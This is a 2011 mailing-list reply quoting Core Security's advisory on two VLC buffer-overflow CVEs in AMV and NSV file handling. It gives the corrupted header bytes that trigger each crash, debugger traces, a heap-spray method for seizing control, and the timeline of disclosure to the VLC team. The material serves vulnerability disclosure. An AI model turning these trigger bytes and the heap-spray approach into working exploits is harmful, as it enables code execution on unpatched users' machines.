[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files
- To: CORE Security Technologies Advisories <advisories@xxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files
- From: Dan Rosenberg <dan.j.rosenberg@xxxxxxxxx>
- Date: Wed, 23 Mar 2011 19:21:51 -0400
Hmm...well, this is one vulnerability, not two, and it was fixed in
VLC's tree on February 12. Still a nice find.
-Dan
On Wed, Mar 23, 2011 at 4:34 PM, CORE Security Technologies Advisories
<advisories@xxxxxxxxxxxxxxxx> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Core Security Technologies - Corelabs Advisory
> http://corelabs.coresecurity.com/
>
> VLC Vulnerabilities handling .AMV and .NSV files
>
>
> 1. *Advisory Information*
>
> Title: VLC Vulnerabilities handling .AMV and .NSV files
> Advisory ID: CORE-2011-0208
> Advisory URL:
> http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files
> Date published: 2011-03-23
> Date of last update: 2011-03-23
> Vendors contacted: VLC team
> Release mode: Coordinated release
>
>
> 2. *Vulnerability Information*
>
> Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119]
> Impact: Code execution
> Remotely Exploitable: Yes (client-side)
> Locally Exploitable: No
> CVE Name: CVE-2010-3275, CVE-2010-3276
>
>
> 3. *Vulnerability Description*
>
> Two vulnerabilities have been found in VLC media player [1], when
> handling .AMV and .NSV file formats. These vulnerabilities can be
> exploited by a remote attacker to obtain arbitrary code execution with
> the privileges of the user running VLC.
>
>
> 4. *Vulnerable packages*
>
> . VLC 1.1.4
> . VLC 1.1.5
> . VLC 1.1.6
> . VLC 1.1.7
> . Older versions may be affected, but were not checked.
>
>
> 5. *Non-vulnerable packages*
>
> . VLC 1.1.8
>
>
> 6. *Vendor Information, Solutions and Workarounds*
>
> These vulnerabilities are fixed in VLC version 1.1.8, which can be
> downloaded from http://www.videolan.org/
>
>
> 7. *Credits*
>
> These vulnerabilities were discovered and researched by Ricardo Narvaja
> from Core Security Technologies. Publication was coordinated by Carlos
> Sarraute.
>
>
> 8. *Technical Description / Proof of Concept Code*
>
>
> 8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files
> [CVE-2010-3275]*
>
> This vulnerability was found by fuzzing different formats. In AMV files
> if the offset 0x41 is changed to a value greater than 90 as shown below:
>
> /-----
> Offset(h)
>
> 00000000 52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54 RIFF....AMV LIST
> 00000010 00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00 ....hdrlamvh8...
> 00000020 24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $ô..............
> 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00000040 A0 A0
>
> - -----/
>
>
> Then the program will crash in the following plugin:
>
> /-----
> Executable modules, item 248
> Base=6D680000
> Size=00017000 (94208.)
> Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
> Name=libdir_1
> Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll
>
> - -----/
>
>
> More precisely in this location:
>
> /-----
> 6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
> 6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
> 6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX
> 6D6812AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
>
> offset
>
> 000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
> 000006A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
> 000006A7 890424 MOV DWORD PTR SS:[ESP],EAX
> 000006AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
>
> registers
>
> EAX 3DD1255C
> ECX 00000000
> EDX 3032344A
> EBX 3DDF9410
> ESP 3F82FC04
> EBP 3DD1229C
> ESI 3DD1255C
> EDI 3DDF90BC
> EIP 6D6812AA libdir_1.6D6812AA
>
> - -----/
>
>
> When executing an appropriate heap spray in Internet explorer:
>
> /-----
> 303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
>
> - -----/
>
>
> We manage to take control of the execution flow and execute our code:
>
> /-----
> 0C0C0C0C 0C 0C OR AL,0C
> 0C0C0C0E 0C 0C OR AL,0C
> 0C0C0C10 0C 0C OR AL,0C
> 0C0C0C12 0C 0C OR AL,0C
> 0C0C0C14 0C 0C OR AL,0C
> 0C0C0C16 0C 0C OR AL,0C
> 0C0C0C18 0C 0C OR AL,0C
> 0C0C0C1A 0C 0C OR AL,0C
> 0C0C0C1C 0C 0C OR AL,0C
> 0C0C0C1E 0C 0C OR AL,0C
> 0C0C0C20 0C 0C OR AL,0C
> 0C0C0C22 0C 0C OR AL,0C
> 0C0C0C24 0C 0C OR AL,0C
> 0C0C0C26 0C 0C OR AL,0C
>
> - -----/
>
>
>
> 8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files
> [CVE-2010-3276]*
>
> In NSV files when changing the offsets 0x0b to 0x0e as shown below:
>
> /-----
> Offset(h)
>
> 00000000 4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01 NSVsVP31MP3_._..
>
> - -----/
>
>
> We can make the program crash in the following plugin:
>
> /-----
> Executable modules, item 248
> Base=6D680000
> Size=00017000 (94208.)
> Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
> Name=libdir_1
> Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll
>
> - -----/
>
>
> More precisely in this location:
>
> /-----
> 6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
> 6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
> 6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX
> 6D6812AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
>
> offset
>
> 000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
> 000006A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
> 000006A7 890424 MOV DWORD PTR SS:[ESP],EAX
> 000006AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
>
> registers
>
> EAX 37CE12FC ASCII "I420"
> ECX 00000000
> EDX 30323449
> EBX 37D8F268
> ESP 3865FC04
> EBP 37CE103C
> ESI 37CE12FC ASCII "I420"
> EDI 37D8E314
> EIP 6D6812AA libdirec.6D6812AA
>
> - -----/
>
>
> When executing an appropriate heap spray in Internet explorer:
>
> /-----
> 303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
> 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
>
> - -----/
>
>
> We make the execution continue in our code:
>
> /-----
> 0C0C0C0C 0C 0C OR AL,0C
> 0C0C0C0E 0C 0C OR AL,0C
> 0C0C0C10 0C 0C OR AL,0C
> 0C0C0C12 0C 0C OR AL,0C
> 0C0C0C14 0C 0C OR AL,0C
> 0C0C0C16 0C 0C OR AL,0C
> 0C0C0C18 0C 0C OR AL,0C
> 0C0C0C1A 0C 0C OR AL,0C
> 0C0C0C1C 0C 0C OR AL,0C
> 0C0C0C1E 0C 0C OR AL,0C
> 0C0C0C20 0C 0C OR AL,0C
> 0C0C0C22 0C 0C OR AL,0C
> 0C0C0C24 0C 0C OR AL,0C
> 0C0C0C26 0C 0C OR AL,0C
>
> - -----/
>
>
>
> 9. *Report Timeline*
>
> . 2011-02-08:
> Core Security Technologies notifies the VLC team of the vulnerabilities.
> Publication date is temporarily set to February 28, 2011.
>
> . 2011-02-08:
> VLC team acknowledges notification and provides PGP keys.
>
> . 2011-02-09:
> Core sends a technical description and PoC files that trigger the
> vulnerabilities.
>
> . 2011-02-18:
> Core asks the VLC team whether they could reproduce the vulnerabilities.
>
> . 2011-02-23:
> VLC team replies that fixes will be included in VLC 1.1.8, and that they
> believe the issue is not exploitable.
>
> . 2011-02-25:
> Core replies that the issues have been confirmed to be exploitable, and
> that the researcher has developed fully working exploits. Core offers to
> reschedule the publication of its advisory to coordinate it with the
> release of fixes.
>
> . 2011-03-10:
> Core requests an update on this issue, since no reply was received. Core
> notes that the PoC files and exploits were tested on Windows only, and
> reschedules publication to March 16, stating that the advisory will be
> published as "user release" if no reply is received.
>
> . 2011-03-10:
> VLC team requests two additional weeks for the release of fixes, and
> asks whether the vulnerabilities are exploitable with ASLR.
>
> . 2011-03-14:
> Core agrees to postpone publication, confirms that the bugs are
> exploitable with ASLR, and requests a concrete date for the release.
>
> . 2011-03-16:
> VLC team states that they would like to release on March 23rd.
>
> . 2011-03-18:
> Core agrees with the release date.
>
> . 2011-03-23:
> Advisory CORE-2011-0208 is published.
>
>
>
> 10. *References*
>
> [1] VLC media player http://www.videolan.org/
>
>
> 11. *About CoreLabs*
>
> CoreLabs, the research center of Core Security Technologies, is charged
> with anticipating the future needs and requirements for information
> security technologies. We conduct our research in several important
> areas of computer security including system vulnerabilities, cyber
> attack planning and simulation, source code auditing, and cryptography.
> Our results include problem formalization, identification of
> vulnerabilities, novel solutions and prototypes for new technologies.
> CoreLabs regularly publishes security advisories, technical papers,
> project information and shared software tools for public use at:
> http://corelabs.coresecurity.com.
>
>
> 12. *About Core Security Technologies*
>
> Core Security Technologies enables organizations to get ahead of threats
> with security test and measurement solutions that continuously identify
> and prove real-world exposures to their most critical assets. Our
> customers can gain real visibility into their security standing, real
> validation of their security controls, and real metrics to more
> effectively secure their organizations.
>
> Core Security's software solutions build on over a decade of trusted
> research and leading-edge threat expertise from the company's Security
> Consulting Services, CoreLabs and Engineering groups. Core Security
> Technologies can be reached at +1 (617) 399-6980 or on the Web at:
> http://www.coresecurity.com.
>
>
> 13. *Disclaimer*
>
> The contents of this advisory are copyright (c) 2011 Core Security
> Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
> Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
> License: http://creativecommons.org/licenses/by-nc-sa/3.0/us
>
>
> 14. *PGP/GPG Keys*
>
> This advisory has been signed with the GPG key of Core Security
> Technologies advisories team, which is available for download at
> http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (MingW32)
>
> iEYEARECAAYFAk2KWWUACgkQyNibggitWa1ilwCgmcHE6sjoDBlD6iaSlYBAJiXA
> wnEAnjC85SPOZ1+ugKtVCGl7bxswqek9
> =oV7u
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/